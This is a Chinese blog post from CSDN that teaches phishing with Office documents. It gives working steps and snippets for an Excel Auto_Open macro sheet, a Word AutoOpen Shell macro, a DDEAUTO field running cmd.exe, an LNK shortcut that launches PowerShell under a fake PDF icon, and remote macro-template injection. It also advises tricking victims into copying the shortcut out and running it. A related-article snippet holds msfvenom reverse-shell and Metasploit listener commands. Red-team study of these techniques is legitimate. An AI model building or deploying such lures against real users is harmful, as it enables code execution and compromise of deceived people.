【钓鱼】基于office的一些钓鱼技法

最新推荐文章于 2025-03-15 18:59:18 发布
原创 最新推荐文章于 2025-03-15 18:59:18 发布 · 737 阅读 · 9 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#钓鱼 #office #宏病毒 #网络安全

目录

excel宏

word宏

Word DDE

office OLE+LNK

利用模板文件注入宏指令

excel宏

先启用excel宏

插入宏表

如下写入

将A1改为Auto_Open(文件打开时自动执行宏)

 

保存后打开文件,成功命令执行

word宏

同样先开启宏

 

添加成功后点击宏

新建AutoOpen

Sub AutoOpen()
Shell ("calc")
End Sub

保存文件

再次打开成功执行命令

下面用office2016来演示

Word DDE

插入域

嵌入恶意公式

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe"}

 

保存后再次打开,成功执行命令

office OLE+LNK

在文件里插入一个恶意快捷方式

先随便创建一个快捷方式,让其指向powershell,并用-command指定恶意命令

%SystemRoot%\system32\WindowsPowerShell\v1.0\powershell.exe -command calc
%SystemRoot%\system32\WindowsPowerShell\v1.0

去下一个pdf风格的png文件,改后缀为ico文件

Application pdf - 文件和文件夹 图标

在word中插入对象

 选择package,更改为之前准备好的pdf图标

再选择之前创建的恶意快捷方式

已经被官方ban了

这里建议更改Ink文件的图标

再重新嵌入文档

这样虽然还是会被直接拦截,但被钓鱼的用户可能会复制出来运行

复制出来

双击运行成功执行命令

利用模板文件注入宏指令

1.制作包含宏的恶意模版文件(.dotm)

参照上面word宏的制作方式


2.将恶意模版文件上传至服务器。


3.新建并保存一个使用任意模版的docx文件。

将docx后缀改为zip


解压docx文件,修改 word\_rels\settings.xml.rels文件的Target属性,将其指向部署恶意模版文件的服务器。


使用zip格式压缩文件,并重新命名后缀为docx。
打开docx文件,成功执行命令

Z3r4y
关注
office钓鱼学习
qq_38618396的博客
12-29 634
先建一个word,找到一张简历,将简历虚化,并另存为doc: 在office中需要使用开发工具,需要自己开启: 文件-更多-选项-自定义功能区-从下列选择命令-主选项卡-开发工具,将开发工具前面的复选框给选上 选择 开发工具-图像控件 将这个控件设置为 浮于文字上方,并将控件拉满文档 点击这个控件,将属性设置为图片的名称 先使用cs生成 在auto_open()函数首部编写代码,设置图片的位置为0、高度为0,让运行后doc上图片消失,然后保存,office马就制作好了 点击之后,c
常见的钓鱼招式,可千万别入坑哦
HBohan的博客
10-19 507
OFFICE 【查看资料】 Office安全保护机制 受保护的视图 为了保护计算机不受office病毒侵害,微软设计了一个收保护视图,将所有可疑的office文件以只读方式打开,在该模式下多数编辑功能被禁用。文件呗以受保护视图打开的情况有如下几种 文件是从 Internet 位置打开的 文件是通过 Outlook 附件的方式接收的,并且计算机策略将发件人定义为不安全 文件是从不安全的位置打开的 文件被文件块阻止 文件验证失败 文件是使用“在受保护的视图中打开”选项打开的 文件是从其他人的 OneDr.
信息收集——Office钓鱼
Gjqhs的博客
03-11 535
了解office宏病毒、CobaltStrike创建和word创建方法 Office钓鱼介绍 office钓鱼 在无需交互、用户无感知的情况下,执行Office文档中内嵌的一段恶意代码,从远控地址中下载并运行恶意可执行程序。例如:远控木马或者勒索病毒等。 CobaltStrike钓鱼 CobaltStrikeoffice钓鱼主要方法是生成一段vba代码,然后将代码复制到office套件中,当用户启动office自动运行。 CobaltStrike操作 点击CobaltStrike主界面中att
网络安全——cobalt Strike 之office钓鱼
weixin_54055099的博客
09-03 1912
Cobalt strike 之office 钓鱼
红队简单钓鱼实战---office
LvHLong的博客
05-30 1711
前言 本文发布已获得本人授权 ,本文仅用于技术学习和交流,严禁用于非法用途,否则产生的一切后果自行承担。 一、office介绍 是微软公司为其OFFICE软件包设计的一个特殊功能,软件设计者为了让人们在使用软件进行工作时,避免一再地重复相同的动作而设计出来的一种工具,它利用简单的语法,把常用的动作写成,当在工作时,就可以直接利用事先编好的自动运行,去完成某项特定的任务,而不必再重复相同的动作,目的是让用户文档中的一些任务自动化。 宏病毒是一种常见的计算机病毒,......
【红队APT】钓鱼篇&Office-CVE漏洞&RLO隐藏&压缩包释放&免杀打包捆绑
今天是几号的博客
04-22 1882
影响:Windows 7/8/8.1/10,Windows Server 2008/2008R2/2012/2012R2/2016/2019/2022等各个主流版本。导致在被禁用的情况下,恶意文档依旧可以使用ms-msdt URI执行任意PowerShell代码。恶意文档从Word远程模板功能从远程Web服务器检索HTML文件,经过免杀后的exe程序(xgpj.exe),进行重命名,在gpl位置插入Unicode控制字符,RLO(从左到右覆盖),如图。6、取出文档执行测试。
153-钓鱼篇&Office对象&LNK快捷方式&CHK电子书&上线免杀方案
dreamer292的博客
09-18 1491
Office对象&LNK快捷方式&CHK电子书的钓鱼方式以及免杀的思路讲解
yolo算法-钓鱼-垂行为数据集-902张图像带标签.zip
11-03
yolo系列算法目标检测数据集,包含标签,可以直接训练模型和验证测试,数据集已经划分好,适用yolov5,yolov8,yolov9,yolov7,yolov10,yolo11算法; 包含两种标签格:yolo格式(txt文件)和voc格式(xml文件),分别...
yolo算法钓鱼-垂行为数据集-976张图像带标签.zip
11-03
yolo系列算法目标检测数据集,包含标签,可以直接训练模型和验证测试,数据集已经划分好,适用yolov5,yolov8,yolov9,yolov7,yolov10,yolo11算法; 包含两种标签格:yolo格式(txt文件)和voc格式(xml文件),分别...
户外钓鱼类网站模板是一款适合垂行业门户钓鱼网站模板下载.zip
02-21
这款“户外钓鱼类网站模板”是专为垂行业设计的一款网页模板,旨在为钓鱼爱好者、垂者、具商家以及相关企业提供一个专业且美观的在线平台。它集成了丰富的功能和元素,以满足钓鱼行业的各类需求,帮助创建一个...
数据集VOC格式岸边垂钓鱼fishing目标检测数据集-4330张
12-27
数据集格式:Pascal VOC格式(不包含分割...重要说明:检测岸边钓鱼人员的数据集,当有人拿个鱼竿或者明显在钓鱼则会被标注 特别声明:本数据集不对训练的模型或者权重文件精度作任何保证,数据集只提供准确且合理标注
基于 OpenCV 的魔兽世界钓鱼机器人
03-11
最后,魔兽世界钓鱼机器人这类自动化工具在实际应用中也存在一些争议,部分玩家和游戏开发者认为使用这类工具破坏了游戏的公平性和乐趣。因此,在开发和使用此类工具时,应当谨慎考虑其对游戏社区可能产生的影响,...
红蓝对抗钓鱼篇之从入门到放弃
m0_61869253的博客
07-27 550
上一章讲到邮件服务器的搭建和使用,那么这章就具体讲解利用方式。在大型企业边界安全做的越来越好的情况下,不管是 APT 攻击还是红蓝对抗演练,钓鱼和水坑攻击被越来越多的应用。钓鱼往往需要免杀技术的支撑,但本章只讲述钓鱼和些许免杀技术,免杀系列学习在后续讲解。
钓鱼的常见几种方式
qq_55894976的博客
08-20 1362
【代码】钓鱼的常见几种方式。
Excel钓鱼
最新发布
volta_xu的博客
03-15 494
Excel钓鱼是一种利用Office功能执行恶意代码的攻击手段。攻击者通过诱导用户启用(通常伪装成重要文档),触发恶意VBA代码从远程服务器下载并执行载荷。msiexec:本实验仅用于教育目的,实际实施可能违反相关法律法规。
MSWord 中的无代码执行
aihua002的博客
06-28 633
如果我们告诉您有一种方法可以在没有任何或内存损坏的情况下在 MSWord 上执行命令怎么办?!在我们的上下文中,DDE 通过执行一个应用程序来工作,该应用程序将提供数据(数据提供程序)。在以前的帖子中1我们讨论了在 MSExcel 中使用 DDE 来执行命令,并且在使用此技术绕过过滤邮件网关和公司 VBA 策略方面取得了巨大成功。DDE 不仅限于 Excel,Word 一直都具有 DDE 功能。其他人已经提到了这一点2作为一种可能的途径,但据我们所知,没有人真正证明这一点是有效的。
分享一个进阶版的钓鱼
acker930616263的博客
07-09 6759
run C_VoiceChat.SpeakText(0, "钓鱼模式,已装配鱼竿", Enum.VoiceTtsDestination.LocalPlayback, 0, 100)/run C_VoiceChat.SpeakText(0, "默认模式,已装配武器", Enum.VoiceTtsDestination.LocalPlayback, 0, 100)/equip 这个是武器切换,/equip 精致的卡鲁亚克鱼竿 这个是你的鱼竿,其他都可不用动,还有语音提示哦。/equip 无尽寒冬。
社会工程学之钓鱼attack常见手段和方法
weixin_51339377的博客
03-27 1516
1.excel钓鱼 msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.186 lport=4444 -f msi -o hack.msi msfconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost=192.168.1.186 show options exploit 将msi粘贴到/var/www/htm..
php 调用 excel _原创干货 | excel钓鱼简介
weixin_39663729的博客
12-06 706
点击关注了解更多精彩内容!!excel钓鱼简介关于excel钓鱼是由来已久的一种攻击方式,目前本人已知的方法有:office攻击DDE攻击power query DDE(DDE的一种)office攻击攻击,一种古老的攻击手法,依靠在office中插入恶意的vbs代码,来执行恶意shellcode。在cs中就有现成的攻击。然后按照步骤加入,用户在启用的情况下即可顺利上线。DDE...
户外钓鱼网站模板下载:适合垂门户设计
2. 垂行业适用性:户外钓鱼类网站模板专为垂行业设计,这意味着它在设计元素和功能模块上都会围绕钓鱼相关主题来展开。例如,可能会包含展示钓鱼技巧、装备推荐、钓鱼场所信息、钓鱼社区讨论等特色功能区。 3. ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值